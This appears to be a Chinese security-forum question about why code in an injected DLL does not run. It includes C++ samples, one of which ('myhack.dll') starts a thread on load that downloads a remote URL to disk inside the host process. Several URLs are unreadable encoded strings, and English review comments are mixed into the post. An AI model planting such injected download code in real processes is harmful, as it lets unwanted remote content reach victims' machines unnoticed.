请教下各位大佬,DLL怎么执行payload,自己动手调试了无数遍就是不成功。
思路是:注入到进程里面,注入成功了但是没有执行代码,我试了各种各样的代码。
相关代码有:
22aK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4q4I4i4K6g2X3x3e0f1%4x3U0M7^5x3o6W2Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0R3K6x3K6b7@1z5e0t1^5207K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4q4I4i4K6g2X3x3K6x3#2y4o6b7&6z5o6S2Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0M7&6x3o6t1^5x3K6b7H3还有些类似的,请问各位大佬是何缘故?耽误各位大佬点时间,解决了请各位大佬喝杯下午茶,捣鼓三天了!
// DLL entry point. Reports process attach (console line plus message box)
// and process detach (message box); thread attach/detach are ignored.
// Always returns TRUE, so the load is never rejected from here.
//
// NOTE(review): DllMain runs while the OS loader lock is held. Microsoft's
// DllMain guidance advises against calling User32 functions such as
// MessageBox, or doing C++ stream I/O, from this callback; treat the calls
// below as debugging aids only, not as a dependable signal that the DLL
// was loaded.
extern "C" BOOL APIENTRY DllMain(HMODULE /* hModule */, DWORD ul_reason_for_call, LPVOID /* lpReserved */)
{
    // Both notifications use the same icon/button combination.
    const UINT boxStyle = MB_ICONINFORMATION | MB_YESNO;

    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        // Only visible when the host process has a console attached to stdout.
        std::cout << "load from dll main" << std::endl;
        MessageBox(NULL, TEXT("dll proc attached"), NULL, boxStyle);
    }
    else if (ul_reason_for_call == DLL_PROCESS_DETACH)
    {
        MessageBox(NULL, TEXT("dll proc detached"), NULL, boxStyle);
    }
    // DLL_THREAD_ATTACH / DLL_THREAD_DETACH: intentionally no action.

    return TRUE;
}
#include "windows.h"
#include "tchar.h"
#pragma comment(lib,"urlmon.lib")
// URL handed to URLDownloadToFile in ThreadProc.
// NOTE(review): the literal below does not look like a valid URL; it appears
// to have been mangled by the hosting page's link rewriting - confirm against
// the original sample before relying on it.
#define DEF_URL (L"a23K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3&6S2N6X3g2J5i4K6u0W2j5$3!0E0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2Z5N6r3#2D9")
// File name that replaces the module's own file name when ThreadProc builds
// the download destination path.
#define DEF_FILE_NAME (L"index.html")
// Handle of this DLL; written by DllMain and read by ThreadProc to locate
// the directory the DLL was loaded from.
HMODULE g_hMod = NULL;
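// Worker thread started from DllMain. Builds "<directory of this DLL>\<DEF_FILE_NAME>"
// and downloads DEF_URL to that path with URLDownloadToFile.
//
// lParam is unused.
// Returns 0 in every case (FALSE on the failure paths, 0 on success), so the
// thread exit code does not distinguish success from failure.
//
// NOTE(review): DEF_URL, DEF_FILE_NAME and the OutputDebugString argument are
// wide literals while the path buffer is TCHAR, so this only compiles when
// UNICODE/_UNICODE are defined.
// NOTE(review): the downloaded content is written to disk without any
// integrity or origin check; anything that later consumes the file must treat
// it as untrusted.
DWORD WINAPI ThreadProc(LPVOID lParam)
{
    TCHAR szPath[_MAX_PATH] = {0,};

    // 0 means the call failed; a value equal to the buffer size means the
    // path was truncated and cannot be trusted as a directory prefix.
    const DWORD cchPath = GetModuleFileName(g_hMod, szPath, _MAX_PATH);
    if (cchPath == 0 || cchPath >= _MAX_PATH)
        return FALSE;

    // Locate the last path separator; the file name after it gets replaced.
    TCHAR *p = _tcsrchr(szPath, '\\');
    if (!p)
        return FALSE;

    // The destination starts at p + 1, so the capacity passed to _tcscpy_s
    // must be what is left of szPath from that point, not the full buffer
    // size. Passing _MAX_PATH here would let the copy (and the debug CRT's
    // buffer fill) run past the end of szPath.
    TCHAR *pName = p + 1;
    const size_t cchRemaining = _MAX_PATH - static_cast<size_t>(pName - szPath);
    if (_tcscpy_s(pName, cchRemaining, DEF_FILE_NAME) != 0)
        return FALSE;

    const HRESULT hr = URLDownloadToFile(NULL, DEF_URL, szPath, 0, NULL);
    if (hr != S_OK)
        return FALSE;

    OutputDebugString(L"down finish!!!!");
    return 0;
}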
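// DLL entry point. Records the module handle in g_hMod and, on process
// attach, starts ThreadProc on a new thread. Always returns TRUE.
//
// hinstDLL    - handle of this DLL, stored for ThreadProc.
// fdwReason   - notification code; only DLL_PROCESS_ATTACH is acted on.
// lpvReserved - unused.
//
// NOTE(review): DllMain runs under the OS loader lock. Creating a thread here
// is allowed, but the callback must not wait for that thread; the work is
// deliberately left to ThreadProc.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    HANDLE hThread = NULL;

    g_hMod = (HMODULE)hinstDLL;

    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        OutputDebugString(L"myhack.dll Injection!!!!");
        hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
        if (hThread)
        {
            // Logged when the thread has been created, not when the download
            // has completed; ThreadProc emits the same text on completion.
            OutputDebugString(L"down finish!!!!");
            // The handle is not needed afterwards. Closing it only when
            // CreateThread succeeded avoids calling CloseHandle(NULL).
            CloseHandle(hThread);
        }
        break;
    }

    return TRUE;
}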
最后于 2019-7-2 16:53
被古朴编辑
,原因: